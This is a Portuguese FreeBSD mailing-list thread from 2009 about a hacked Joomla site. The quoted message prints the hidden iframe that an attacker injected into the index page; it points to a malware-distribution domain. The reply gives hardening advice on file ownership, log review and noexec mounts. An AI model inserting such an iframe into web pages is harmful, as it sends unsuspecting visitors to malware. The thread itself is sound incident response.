[FUG-BR] [off-topic] Index modificado
Marcello
unixmafia em yahoo.com.br
Terça Janeiro 13 15:27:39 BRST 2009
O causa mais provavel devem ser o dono do arquivo e permissão de
gravação , o log do apache pode te fornecer algumas dicas de quando isso
ocorreu.
Verifique se dono do arquivo for www:www , deixe root:www, mas o melhor
seria um grupo joomla ou um usuario qualquer diferente do apache.
Colocar a pasta publica do apache em uma partição montada com noexec e
nosuid é um excelente modo de evitar supresas.
Agora isso é furo da aplicação , do joomla que permitiu o uso de algum
script .
Abraços
Em Ter, 2009-01-13 às 14:21 -0400, Siclal Oliveira escreveu:
> Olá lista
>
> Esta é minha primeira participação na lista.
> Já trabalho há algum tempo com Freebsd, de forma que espero poder
> contribuir de alguma forma.
>
> Bem, estou com um problema em um dos servidores que administro:
> O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do
> php e do mysql atualizados.
> Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que
> eu desabilitasse o safe mode do php.
> A atualização do Joomla ficaria por conta dele, mas para a minha
> surpresa, atualmente está utilizando a versão 1.0.15, quando a mais
> atualizada seria a 1.5.9.
> Fui chamado porque ao abrir a página era startado um direcionamento a
> uma página com vírus.
> Verificando o index, percebi que havia sido inserido um código
> malicioso não última linha:
>
> <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1
> height=1 style="visibility: hidden"></iframe></body></html>
>
> Eu imagino que a insersão deva ter ocorrido a partir de alguma falha
> do joomla, mas gostaria de saber como proceder com os logs a fim de
> identificar este incidente.
> Como eu poderia saber se o meu servidor foi afetado gravemente.
>
> Desde já agradeço.
>
> Abraços a todos.
>
> Siclal
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Mais detalhes sobre a lista de discussão freebsd